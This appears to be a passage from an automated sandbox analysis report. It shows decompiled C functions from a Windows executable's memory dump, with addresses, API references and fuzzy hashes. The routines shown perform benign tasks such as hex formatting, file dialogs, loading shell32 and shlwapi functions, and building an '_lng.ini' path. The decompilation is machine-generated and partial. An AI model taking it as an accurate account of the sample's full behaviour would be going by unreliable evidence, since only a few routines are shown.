                                                                                                                0x004016bb
                                                                                                                0x004016bc
                                                                                                                0x004016c1
                                                                                                                0x004016c8
                                                                                                                0x004016cd
                                                                                                                0x004016ce
                                                                                                                0x004016ea
                                                                                                                0x004016ff
                                                                                                                0x0040170c
                                                                                                                0x004016d0
                                                                                                                0x004016e3
                                                                                                                0x004016e3
                                                                                                                0x00401711
                                                                                                                0x00401714
                                                                                                                0x00000000
                                                                                                                0x00401719
                                                                                                                0x0040171c

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf
                                                                                                                • String ID: Line%d$Lines
                                                                                                                • API String ID: 3988819677-2790224864
                                                                                                                • Opcode ID: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
                                                                                                                • Instruction ID: 1021665491e9d2d06496d958327cd8fefc515fbb55266dd5f91e98284186a054
                                                                                                                • Opcode Fuzzy Hash: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
                                                                                                                • Instruction Fuzzy Hash: 4C110071A00208EFCB15DF98C8C1D9EB7B9EF48704F1045BAF645E7281D778AA458B68
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040512F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 70%
                                                                                                                			E0040512F(intOrPtr _a4, intOrPtr _a8, void* _a12) {
				void* _v8;
				void* _v26;
				void _v28;
				void* _t24;
				void* _t25;
				void* _t35;
				signed int _t38;
				signed int _t42;
				void* _t44;
				void* _t45;

				_t24 = _a12;
				_t45 = _t44 - 0x18;
				_t42 = 0;
				 *_t24 = 0;
				if(_a8 <= 0) {
					_t25 = 0;
				} else {
					_t38 = 0;
					_t35 = 0;
					if(_a8 > 0) {
						_v8 = _t24;
						while(1) {
							_v28 = _v28 & 0x00000000;
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosw");
							_push( *(_t35 + _a4) & 0x000000ff);
							_push(L"%2.2X ");
							_push(0xa);
							_push( &_v28);
							L0040B1EC();
							_t38 = _t42;
							memcpy(_v8,  &_v28, 6);
							_t13 = _t42 + 3; // 0x3
							_t45 = _t45 + 0x1c;
							if(_t13 >= 0x2000) {
								break;
							}
							_v8 = _v8 + 6;
							_t35 = _t35 + 1;
							_t42 = _t42 + 3;
							if(_t35 < _a8) {
								continue;
							}
							break;
						}
						_t24 = _a12;
					}
					 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
					_t25 = 1;
				}
				return _t25;
			}













                                                                                                                0x00405132
                                                                                                                0x00405135
                                                                                                                0x00405139
                                                                                                                0x0040513e
                                                                                                                0x00405141
                                                                                                                0x004051b3
                                                                                                                0x00405143
                                                                                                                0x00405145
                                                                                                                0x00405147
                                                                                                                0x0040514c
                                                                                                                0x0040514e
                                                                                                                0x00405151
                                                                                                                0x00405151
                                                                                                                0x0040515b
                                                                                                                0x0040515c
                                                                                                                0x0040515d
                                                                                                                0x0040515e
                                                                                                                0x0040515f
                                                                                                                0x00405168
                                                                                                                0x00405169
                                                                                                                0x00405171
                                                                                                                0x00405173
                                                                                                                0x00405174
                                                                                                                0x00405182
                                                                                                                0x00405184
                                                                                                                0x00405189
                                                                                                                0x0040518c
                                                                                                                0x00405194
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405196
                                                                                                                0x0040519a
                                                                                                                0x0040519b
                                                                                                                0x004051a1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004051a1
                                                                                                                0x004051a3
                                                                                                                0x004051a3
                                                                                                                0x004051a6
                                                                                                                0x004051af
                                                                                                                0x004051b0
                                                                                                                0x004051b7

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintfmemcpy
                                                                                                                • String ID: %2.2X
                                                                                                                • API String ID: 2789212964-323797159
                                                                                                                • Opcode ID: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                                                • Instruction ID: b76e4bbe2d26c53343c630e3245d096d82678977124e835a89109146ed91de65
                                                                                                                • Opcode Fuzzy Hash: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                                                • Instruction Fuzzy Hash: 5A11A532900608BFEB01DFE8C882AAF77B9FB45314F104477ED14EB141D6789A058BD5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004075BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 43%
                                                                                                                			E004075BB(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				char _v44;
				intOrPtr _t22;
				signed int _t30;
				signed int _t34;
				void* _t35;
				void* _t36;

				_t35 = __esi;
				_t34 = 0;
				if( *((intOrPtr*)(__esi + 0x2c)) > 0) {
					do {
						_t30 =  *( *((intOrPtr*)(__esi + 0x30)) + _t34 * 4);
						_t22 =  *((intOrPtr*)(_t30 * 0x14 +  *((intOrPtr*)(__esi + 0x40)) + 0xc));
						L0040B1EC();
						_push( *((intOrPtr*)( *_a8))(_t30,  *((intOrPtr*)(__esi + 0x64)),  &_v44, 0x14, L"%%-%d.%ds ", _t22, _t22));
						_push( &_v44);
						_push(0x2000);
						_push( *((intOrPtr*)(__esi + 0x60)));
						L0040B1EC();
						_t36 = _t36 + 0x24;
						E00407343(__esi, _a4,  *((intOrPtr*)(__esi + 0x60)));
						_t34 = _t34 + 1;
					} while (_t34 <  *((intOrPtr*)(__esi + 0x2c)));
				}
				return E00407343(_t35, _a4, L"\r\n");
			}









                                                                                                                0x004075bb
                                                                                                                0x004075c2
                                                                                                                0x004075c7
                                                                                                                0x004075ca
                                                                                                                0x004075cd
                                                                                                                0x004075d8
                                                                                                                0x004075e9
                                                                                                                0x004075fc
                                                                                                                0x00407600
                                                                                                                0x00407601
                                                                                                                0x00407606
                                                                                                                0x00407609
                                                                                                                0x0040760e
                                                                                                                0x00407619
                                                                                                                0x0040761e
                                                                                                                0x0040761f
                                                                                                                0x00407624
                                                                                                                0x00407636

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf
                                                                                                                • String ID: %%-%d.%ds
                                                                                                                • API String ID: 3988819677-2008345750
                                                                                                                • Opcode ID: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                                                • Instruction ID: ecb877ded915dbad8d5af0e436ed4e240226c92ce5a1c47ab2288d53f8dcf9da
                                                                                                                • Opcode Fuzzy Hash: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                                                • Instruction Fuzzy Hash: BC01B931600704AFD7109F69CC82D5A77ADFF48304B004439FD86B7292D635F911DBA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040507A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040507A(intOrPtr __eax, wchar_t* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				wchar_t* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;

				_v76 = __eax;
				_v68 = _a4;
				_v64 = 0;
				_v44 = 0;
				_v36 = 0;
				_v32 = _a8;
				_v20 = _a12;
				_v80 = 0x4c;
				_v56 = 1;
				_v52 = __esi;
				_v48 = 0x104;
				_v28 = 0x81804;
				if(GetOpenFileNameW( &_v80) == 0) {
					return 0;
				} else {
					wcscpy(__esi, _v52);
					return 1;
				}
			}















                                                                                                                0x00405080
                                                                                                                0x00405086
                                                                                                                0x0040508b
                                                                                                                0x0040508e
                                                                                                                0x00405091
                                                                                                                0x00405097
                                                                                                                0x0040509d
                                                                                                                0x004050a4
                                                                                                                0x004050ab
                                                                                                                0x004050b2
                                                                                                                0x004050b5
                                                                                                                0x004050bc
                                                                                                                0x004050cb
                                                                                                                0x004050e0
                                                                                                                0x004050cd
                                                                                                                0x004050d1
                                                                                                                0x004050dc
                                                                                                                0x004050dc

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: FileNameOpenwcscpy
                                                                                                                • String ID: L
                                                                                                                • API String ID: 3246554996-2909332022
                                                                                                                • Opcode ID: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                                                • Instruction ID: bc55e530e402ba4b599a228f817f204aa1fc4279979982f23bca087f07049b97
                                                                                                                • Opcode Fuzzy Hash: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                                                • Instruction Fuzzy Hash: 9A015FB1D102199FDF40DFA9D885ADEBBF4BB08304F14812AE915F6240E77495458F98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040906D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E0040906D(struct HINSTANCE__** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* __esi;
				_Unknown_base(*)()* _t10;
				void* _t12;
				struct HINSTANCE__** _t13;

				_t13 = __eax;
				_t12 = 0;
				if(E00408F72(__eax) != 0) {
					_t10 = GetProcAddress( *_t13, "LookupAccountSidW");
					if(_t10 != 0) {
						_t12 =  *_t10(0, _a4, _a8, _a12, _a16, _a20, _a24);
					}
				}
				return _t12;
			}







                                                                                                                0x00409072
                                                                                                                0x00409074
                                                                                                                0x0040907d
                                                                                                                0x00409086
                                                                                                                0x0040908e
                                                                                                                0x004090a5
                                                                                                                0x004090a5
                                                                                                                0x0040908e
                                                                                                                0x004090ac

                                                                                                                APIs
                                                                                                                • GetProcAddress.KERNEL32(?,LookupAccountSidW), ref: 00409086
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc
                                                                                                                • String ID: LookupAccountSidW$Y@
                                                                                                                • API String ID: 190572456-2352570548
                                                                                                                • Opcode ID: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                                                • Instruction ID: 3ebfd29b958db2e29df2983e37ea976ab6b1d16e8490ad6d4f073a9de280f7a1
                                                                                                                • Opcode Fuzzy Hash: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                                                • Instruction Fuzzy Hash: F5E0E537100109BBDF125E96DD01CAB7AA79F84750B144035FA54E1161D6368821A794
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040AD85, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 37%
                                                                                                                			E0040AD85(intOrPtr _a4) {
				_Unknown_base(*)()* _t3;
				void* _t7;
				struct HINSTANCE__* _t8;
				char** _t9;

				_t7 = 0;
				_t8 = E00405436(L"shlwapi.dll");
				 *_t9 = "SHAutoComplete";
				_t3 = GetProcAddress(_t8, ??);
				if(_t3 != 0) {
					_t7 =  *_t3(_a4, 0x10000001);
				}
				FreeLibrary(_t8);
				return _t7;
			}







                                                                                                                0x0040ad8c
                                                                                                                0x0040ad93
                                                                                                                0x0040ad95
                                                                                                                0x0040ad9d
                                                                                                                0x0040ada5
                                                                                                                0x0040adb2
                                                                                                                0x0040adb2
                                                                                                                0x0040adb5
                                                                                                                0x0040adbf

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Library$Load$AddressFreeProcmemsetwcscat
                                                                                                                • String ID: shlwapi.dll
                                                                                                                • API String ID: 4092907564-3792422438
                                                                                                                • Opcode ID: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                                                • Instruction ID: 3ba04cc2888c968bb17b12a51753cff707eeab9003a5d350ca2caef87bad7666
                                                                                                                • Opcode Fuzzy Hash: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                                                • Instruction Fuzzy Hash: E1D01235211111EBD7616B66AD44A9F7AA6DFC1351B060036F544F2191DB3C4846C669
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00406597, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00406597(wchar_t* __esi) {
				wchar_t* _t2;
				wchar_t* _t6;

				_t6 = __esi;
				E00404AD9(__esi);
				_t2 = wcsrchr(__esi, 0x2e);
				if(_t2 != 0) {
					 *_t2 =  *_t2 & 0x00000000;
				}
				return wcscat(_t6, L"_lng.ini");
			}





                                                                                                                0x00406597
                                                                                                                0x00406598
                                                                                                                0x004065a0
                                                                                                                0x004065aa
                                                                                                                0x004065ac
                                                                                                                0x004065ac
                                                                                                                0x004065bd

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                • wcsrchr.MSVCRT ref: 004065A0
                                                                                                                • wcscat.MSVCRT ref: 004065B6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                • String ID: _lng.ini
                                                                                                                • API String ID: 383090722-1948609170
                                                                                                                • Opcode ID: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                                                • Instruction ID: e4456dc4ef972d75cd366ed24565615e7e819105f92635e6590d4ece6e8d8120
                                                                                                                • Opcode Fuzzy Hash: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                                                • Instruction Fuzzy Hash: 16C01292682620A4E2223322AC03B4F1248CF62324F21407BF906381C7EFBD826180EE
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040AC52, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040AC52() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;

				if( *0x4101c4 == 0) {
					_t1 = E00405436(L"shell32.dll");
					 *0x4101c4 = _t1;
					if(_t1 != 0) {
						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
						 *0x4101c0 = _t2;
						return _t2;
					}
				}
				return _t1;
			}





                                                                                                                0x0040ac59
                                                                                                                0x0040ac60
                                                                                                                0x0040ac68
                                                                                                                0x0040ac6d
                                                                                                                0x0040ac75
                                                                                                                0x0040ac7b
                                                                                                                0x00000000
                                                                                                                0x0040ac7b
                                                                                                                0x0040ac6d
                                                                                                                0x0040ac80

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040AC75
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                                • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                • API String ID: 946536540-880857682
                                                                                                                • Opcode ID: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                                                • Instruction ID: 297d67d15b42b64e279660486abf15c243c4c6a8dcafd005a32ae5f28444c9d4
                                                                                                                • Opcode Fuzzy Hash: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                                                • Instruction Fuzzy Hash: 9AD0C9B0D8A301ABE7106BB0AF05B523AA4B704301F12417BF800B12E0DBBE90888A1E
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00406670, Relevance: 5.1, APIs: 4, Instructions: 73COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 90%
                                                                                                                			E00406670(char** __esi, void* __eflags) {
				char* _t30;
				char** _t39;

				_t39 = __esi;
				 *__esi = "cf@";
				__esi[0xb8] = 0;
				_t30 = E00404FA4(0x338, __esi);
				_push(0x14);
				__esi[0xcb] = 0;
				__esi[0xa6] = 0;
				__esi[0xb9] = 0;
				__esi[0xba] = 0xfff;
				__esi[8] = 0;
				__esi[1] = 0;
				__esi[0xb7] = 1;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[2] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[3] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[4] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_t39[5] = _t30;
				return _t39;
			}





                                                                                                                0x00406670
                                                                                                                0x0040667a
                                                                                                                0x00406680
                                                                                                                0x00406686
                                                                                                                0x0040668b
                                                                                                                0x0040668d
                                                                                                                0x00406693
                                                                                                                0x00406699
                                                                                                                0x0040669f
                                                                                                                0x004066a9
                                                                                                                0x004066ac
                                                                                                                0x004066af
                                                                                                                0x004066b9
                                                                                                                0x004066c7
                                                                                                                0x004066d9
                                                                                                                0x004066c9
                                                                                                                0x004066c9
                                                                                                                0x004066cc
                                                                                                                0x004066cf
                                                                                                                0x004066d2
                                                                                                                0x004066d5
                                                                                                                0x004066d5
                                                                                                                0x004066db
                                                                                                                0x004066dd
                                                                                                                0x004066e0
                                                                                                                0x004066e8
                                                                                                                0x004066fa
                                                                                                                0x004066ea
                                                                                                                0x004066ea
                                                                                                                0x004066ed
                                                                                                                0x004066f0
                                                                                                                0x004066f3
                                                                                                                0x004066f6
                                                                                                                0x004066f6
                                                                                                                0x004066fc
                                                                                                                0x004066fe
                                                                                                                0x00406701
                                                                                                                0x00406709
                                                                                                                0x0040671b
                                                                                                                0x0040670b
                                                                                                                0x0040670b
                                                                                                                0x0040670e
                                                                                                                0x00406711
                                                                                                                0x00406714
                                                                                                                0x00406717
                                                                                                                0x00406717
                                                                                                                0x0040671d
                                                                                                                0x0040671f
                                                                                                                0x00406722
                                                                                                                0x0040672a
                                                                                                                0x0040673c
                                                                                                                0x0040672c
                                                                                                                0x0040672c
                                                                                                                0x0040672f
                                                                                                                0x00406732
                                                                                                                0x00406735
                                                                                                                0x00406738
                                                                                                                0x00406738
                                                                                                                0x0040673f
                                                                                                                0x00406745

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ??2@$memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1860491036-0
                                                                                                                • Opcode ID: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                                                • Instruction ID: f950f85206354bd8a0b3bb5dce35e971dba3beadb745d31d99e8bf3535aee89b
                                                                                                                • Opcode Fuzzy Hash: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                                                • Instruction Fuzzy Hash: F121D4B0A007008FD7219F2AC448956FBE8FF90314B2689BFD15ADB2B1D7B89441DF18
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004054DF, Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004054DF(signed int* __eax, void* __ecx, wchar_t* _a4) {
				int _v8;
				signed int _v12;
				void* __edi;
				int _t32;
				intOrPtr _t33;
				intOrPtr _t36;
				signed int _t48;
				signed int _t58;
				signed int _t59;
				void** _t62;
				void** _t63;
				signed int* _t66;

				_t66 = __eax;
				_t32 = wcslen(_a4);
				_t48 =  *(_t66 + 4);
				_t58 = _t48 + _t32;
				_v12 = _t58;
				_t59 = _t58 + 1;
				_v8 = _t32;
				_t33 =  *((intOrPtr*)(_t66 + 0x14));
				 *(_t66 + 4) = _t59;
				_t62 = _t66 + 0x10;
				if(_t59 != 0xffffffff) {
					E00404951(_t66, _t59, _t62, 2, _t33);
				} else {
					free( *_t62);
				}
				_t60 =  *(_t66 + 0x1c);
				_t36 =  *((intOrPtr*)(_t66 + 0x18));
				_t63 = _t66 + 0xc;
				if( *(_t66 + 0x1c) != 0xffffffff) {
					E00404951(_t66 + 8, _t60, _t63, 4, _t36);
				} else {
					free( *_t63);
				}
				memcpy( *(_t66 + 0x10) + _t48 * 2, _a4, _v8 + _v8);
				 *((short*)( *(_t66 + 0x10) + _v12 * 2)) =  *( *(_t66 + 0x10) + _v12 * 2) & 0x00000000;
				 *( *_t63 +  *(_t66 + 0x1c) * 4) = _t48;
				 *(_t66 + 0x1c) =  *(_t66 + 0x1c) + 1;
				_t30 =  *(_t66 + 0x1c) - 1; // -1
				return _t30;
			}















                                                                                                                0x004054ea
                                                                                                                0x004054ec
                                                                                                                0x004054f1
                                                                                                                0x004054f4
                                                                                                                0x004054f7
                                                                                                                0x004054fa
                                                                                                                0x004054fe
                                                                                                                0x00405501
                                                                                                                0x00405505
                                                                                                                0x00405508
                                                                                                                0x0040550b
                                                                                                                0x0040551b
                                                                                                                0x0040550d
                                                                                                                0x0040550f
                                                                                                                0x0040550f
                                                                                                                0x00405521
                                                                                                                0x00405527
                                                                                                                0x0040552b
                                                                                                                0x0040552e
                                                                                                                0x0040553f
                                                                                                                0x00405530
                                                                                                                0x00405532
                                                                                                                0x00405532
                                                                                                                0x00405556
                                                                                                                0x00405561
                                                                                                                0x0040556e
                                                                                                                0x00405571
                                                                                                                0x00405578
                                                                                                                0x0040557e

                                                                                                                APIs
                                                                                                                • wcslen.MSVCRT ref: 004054EC
                                                                                                                • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 0040550F
                                                                                                                  • Part of subcall function 00404951: malloc.MSVCRT ref: 0040496D
                                                                                                                  • Part of subcall function 00404951: memcpy.MSVCRT ref: 00404985
                                                                                                                  • Part of subcall function 00404951: free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                                                • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 00405532
                                                                                                                • memcpy.MSVCRT ref: 00405556
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
